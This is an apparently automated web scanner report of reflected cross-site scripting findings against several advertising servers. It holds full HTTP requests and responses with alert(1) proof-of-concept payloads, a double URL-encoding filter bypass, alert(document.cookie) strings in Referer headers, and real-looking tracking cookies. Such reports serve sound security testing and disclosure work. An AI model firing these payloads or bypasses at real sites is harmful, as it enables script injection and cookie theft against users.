GET /iframe!t=639!?che=7735200&clk1=c48dd"%3balert(1)//51cb3eab07a HTTP/1.1
Host: ad.aggregateknowledge.com
Proxy-Connection: keep-alive
Referer: http://www.aisledash.com/_uac/adpage.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=65385214552746607; Version=1; Domain=.aggregateknowledge.com; Max-Age=157680000; Expires=Fri, 05-Feb-2016 20:24:01 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=5|0BAJZGIgAAAAAAAEAhgEAngEDPwEQAAEAhn53%2FItTDiD8ogAAAAAAAAHiAAAAAAAAAz8AAAAAAAAAngAdAAA%3D; Version=1; Domain=.aggregateknowledge.com; Max-Age=63072000; Expires=Tue, 05-Feb-2013 20:24:01 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sun, 06 Feb 2011 20:24:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href=\"c48dd";alert(1)//51cb3eab07ahttp://ad.aggregateknowledge.com/interaction!che=1886299562?imid=8645938573480098978&ipid=482&caid=134&cgid=158&crid=831&a=CLICK&adid=29&status=0&l=http://www.pantene.com/en-US/news-and-offers/Pages/sa
...[SNIP]...

1.7. http://ad.aggregateknowledge.com/iframe!t=639! [clk1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.aggregateknowledge.com
Path:   /iframe!t=639!

Issue detail

The value of the clk1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb519"><script>alert(1)</script>9f3b6c26b66 was submitted in the clk1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=639!?che=7735200&clk1=cb519"><script>alert(1)</script>9f3b6c26b66 HTTP/1.1
Host: ad.aggregateknowledge.com
Proxy-Connection: keep-alive
Referer: http://www.aisledash.com/_uac/adpage.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=289089061502008663; Version=1; Domain=.aggregateknowledge.com; Max-Age=157680000; Expires=Fri, 05-Feb-2016 20:24:01 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=5|0BAJZGIgAAAAAAAEAhgEAngEDWQEQAAEAhn4H0B%2BXD6%2FnigAAAAAAAAHiAAAAAAAAA1kAAAAAAAAAngAdAAA%3D; Version=1; Domain=.aggregateknowledge.com; Max-Age=63072000; Expires=Tue, 05-Feb-2013 20:24:01 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sun, 06 Feb 2011 20:24:01 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="cb519"><script>alert(1)</script>9f3b6c26b66http://ad.aggregateknowledge.com/interaction!che=2014193925?imid=562984687085021066&ipid=482&caid=134&cgid=158&crid=857&a=CLICK&adid=29&status=0&l=http://www.pantene.com/en-US/news-and-offers/Pages/sat
...[SNIP]...

1.8. http://ad.doubleclick.net/adj/brokerbutton.smartmoney.com/article_tools [kw parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/brokerbutton.smartmoney.com/article_tools

Issue detail

The value of the kw request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe590'%3balert(1)//d0f1bb128f1 was submitted in the kw parameter. This input was echoed as fe590';alert(1)//d0f1bb128f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/brokerbutton.smartmoney.com/article_tools;kw=fe590'%3balert(1)//d0f1bb128f1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/investing/etfsaa2c4'-alert(document.cookie)-'46ed6e85f39/are-hedgefund-etfs-worth-owning-1296838261078/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 380
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 06 Feb 2011 20:59:12 GMT
Expires: Sun, 06 Feb 2011 20:59:12 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aa6/0/0/%2a/k;235708319;0-0;0;47801202;255-0/0;40500764/40518551/1;;~okv=;kw=fe590';alert(1)//d0f1bb128f1;~aopt=2/0/ff/0;~sscs=%3fhttp://ad.doubleclick.net/clk;235364356;59005779;s;pc=[TPAS_ID]">
...[SNIP]...

1.9. http://ad.doubleclick.net/adj/brokerbutton.smartmoney.com/article_tools [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/brokerbutton.smartmoney.com/article_tools

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68712'-alert(1)-'595c492cbdb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/brokerbutton.smartmoney.com/article_tools;kw=ETFs;kw=Investing;columns=;contentid=26488;pos=4;ticker=QAI;ticker=MCRO;ticker=MNA;ticker=ALT;ticker=SPY;pagetemplate=1;level2=etfs;level2=etfs;tile=4;sz=120x30;ord=1557503509?&68712'-alert(1)-'595c492cbdb=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/investing/etfsaa2c4'-alert(document.cookie)-'46ed6e85f39/are-hedgefund-etfs-worth-owning-1296838261078/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 06 Feb 2011 20:59:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 443

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aa6/0/0/%2a/o;44306;0-0;0;47801202;47-120/30;0/0/0;;~okv=;kw=ETFs;kw=Investing;columns=;contentid=26488;pos=4;ticker=QAI;ticker=MCRO;ticker=MNA;ticker=ALT;ticker=SPY;pagetemplate=1;level2=etfs;level2=etfs;tile=4;sz=120x30;;68712'-alert(1)-'595c492cbdb=1;~aopt=2/0/ff/0;~sscs=%3f">
...[SNIP]...

1.10. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/1297024518** [10,1,103;1920;1200;http%3A_@2F_@2Fwww.dailyfinance.com_@2F_@3F3054c%2522-alertdocument.cookie-%2522c83105876b0%3D1?click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/1297024518**

Issue detail

The value of the 10,1,103;1920;1200;http%3A_@2F_@2Fwww.dailyfinance.com_@2F_@3F3054c%2522-alertdocument.cookie-%2522c83105876b0%3D1?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fbf18'-alert(1)-'10c9706c898 was submitted in the 10,1,103;1920;1200;http%3A_@2F_@2Fwww.dailyfinance.com_@2F_@3F3054c%2522-alertdocument.cookie-%2522c83105876b0%3D1?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/1297024518**;10,1,103;1920;1200;http%3A_@2F_@2Fwww.dailyfinance.com_@2F_@3F3054c%2522-alertdocument.cookie-%2522c83105876b0%3D1?click=http://at.atwola.com/adlink/5113/1789113/0/4/AdId=1349294;BnId=1;itime=24516506;kvpg=dailyfinance;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93310212;kvtid=16if17a0kq0bgd;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204:50237:50228:50229;nodecode=yes;link=fbf18'-alert(1)-'10c9706c898 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=19:1543:207:0:0:38885:1297024518:L|19:1543:207:0:0:38885:1297021627:L|33:353:22:3:0:38885:1296915697:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 06 Feb 2011 20:35:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 09-Mar-2011 20:35:53 GMT; path=/
Set-Cookie: i_1=19:1537:705:23:0:38885:1297024553:L|19:1543:207:0:0:38885:1297024518:L|19:1543:207:0:0:38885:1297021627:L; expires=Tue, 08-Mar-2011 20:35:53 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 928

   function wsod_image() {
       document.write('<a href="http://at.atwola.com/adlink/5113/1789113/0/4/AdId=1349294;BnId=1;itime=24516506;kvpg=dailyfinance;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn
...[SNIP]...
eg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204:50237:50228:50229;nodecode=yes;link=fbf18'-alert(1)-'10c9706c898http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1537.705.js.234x60/**;10.1103;1920;1200;http:_@2F_@2Fwww.dailyfinance.com_@2F_@3F3054c-alertdocument.cookie-c83105876b0=1" target="_blank" tit
...[SNIP]...

1.11. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/1297024518** [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/1297024518**

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d164'-alert(1)-'c88d9c62617 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/1297024518**;10,1,103;1920;1200;http%3A_@2F_@2Fwww.dailyfinance.com_@2F_@3F3054c%2522-alertdocument.cookie-%2522c83105876b0%3D1?click=http://at.atwola.com/adlink/5113/1789113/0/4/AdId=1349294;BnId=1;itime=24516506;kvpg=dailyfinance;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93310212;kvtid=16if17a0kq0bgd;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204:50237:50228:50229;nodecode=yes;link=&5d164'-alert(1)-'c88d9c62617=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=19:1543:207:0:0:38885:1297024518:L|19:1543:207:0:0:38885:1297021627:L|33:353:22:3:0:38885:1296915697:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 06 Feb 2011 20:35:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 09-Mar-2011 20:35:58 GMT; path=/
Set-Cookie: i_1=19:1537:706:23:0:38885:1297024558:L|19:1543:207:0:0:38885:1297024518:L|19:1543:207:0:0:38885:1297021627:L; expires=Tue, 08-Mar-2011 20:35:58 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 929

   function wsod_image() {
       document.write('<a href="http://at.atwola.com/adlink/5113/1789113/0/4/AdId=1349294;BnId=1;itime=24516506;kvpg=dailyfinance;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn
...[SNIP]...
g=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204:50237:50228:50229;nodecode=yes;link=&5d164'-alert(1)-'c88d9c62617=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1537.706.js.234x60/**;10.1103;1920;1200;http:_@2F_@2Fwww.dailyfinance.com_@2F_@3F3054c-alertdocument.cookie-c83105876b0=1" target="_blank" t
...[SNIP]...

1.12. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/24516506 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/24516506

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29654%2522%253balert%25281%2529%252f%252fbaf59fc0de was submitted in the REST URL parameter 2. This input was echoed as 29654";alert(1)//baf59fc0de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a63135729654%2522%253balert%25281%2529%252f%252fbaf59fc0de/1537.0.js.234x60/24516506?click=http://at.atwola.com/adlink/5113/1789113/0/4/AdId=1349294;BnId=1;itime=24516506;kvpg=dailyfinance;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93310212;kvtid=16if17a0kq0bgd;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204:50237:50228:50229;nodecode=yes;link= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=19:1543:207:0:0:38885:1297021627:L|33:353:22:3:0:38885:1296915697:L|33:353:78:3:0:38655:1296683296:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 06 Feb 2011 20:35:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1917

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a63135729654";alert(1)//baf59fc0de/1537.0.js.234x60/1297024559**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://at.atwola.com/adlink/5113/1789113/0/4/AdId=1349294;BnId=1;itime=24516506;kvpg=dailyfinance;kvugc=0;kvui=e10784
...[SNIP]...

1.13. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/24516506 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/24516506

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1db4%2522%253balert%25281%2529%252f%252f81b157f6309 was submitted in the REST URL parameter 3. This input was echoed as d1db4";alert(1)//81b157f6309 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60d1db4%2522%253balert%25281%2529%252f%252f81b157f6309/24516506?click=http://at.atwola.com/adlink/5113/1789113/0/4/AdId=1349294;BnId=1;itime=24516506;kvpg=dailyfinance;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93310212;kvtid=16if17a0kq0bgd;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204:50237:50228:50229;nodecode=yes;link= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=19:1543:207:0:0:38885:1297021627:L|33:353:22:3:0:38885:1296915697:L|33:353:78:3:0:38655:1296683296:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 06 Feb 2011 20:36:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1918

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60d1db4";alert(1)//81b157f6309/1297024561**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://at.atwola.com/adlink/5113/1789113/0/4/AdId=1349294;BnId=1;itime=24516506;kvpg=dailyfinance;kvugc=0;kvui=e107840a322911e0a718c3f
...[SNIP]...

1.14. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/24516506 [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/24516506

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dcde6"-alert(1)-"469bc60813b was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/24516506?click=http://at.atwola.com/adlink/5113/1789113/0/4/AdId=1349294;BnId=1;itime=24516506;kvpg=dailyfinance;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93310212;kvtid=16if17a0kq0bgd;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204:50237:50228:50229;nodecode=yes;link=dcde6"-alert(1)-"469bc60813b HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=19:1543:207:0:0:38885:1297021627:L|33:353:22:3:0:38885:1296915697:L|33:353:78:3:0:38655:1296683296:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 06 Feb 2011 20:35:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1918

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
eg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204:50237:50228:50229;nodecode=yes;link=dcde6"-alert(1)-"469bc60813b">
...[SNIP]...

1.15. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/24516506 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/24516506

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ece2"-alert(1)-"d2c7ce0c658 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/24516506?click=http://at.atwola.com/adlink/5113/1789113/0/4/AdId=1349294;BnId=1;itime=24516506;kvpg=dailyfinance;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93310212;kvtid=16if17a0kq0bgd;kvseg=99999:50012:51133:51184:52611:52615:52947:53575:54490:54898:54938:54954:56432:56555:56732:56733:56780:60425:60488:60490:60491:60506:60739:61674:50213:50220:50204:50237:50228:50229;nodecode=yes;link=&3ece2"-alert(1)-"d2c7ce0c658=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=19:1543:207:0:0:38885:1297021627:L|33:353:22:3:0:38885:1296915697:L|33:353:78:3:0:38655:1296683296:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 06 Feb 2011 20:35:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1921

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
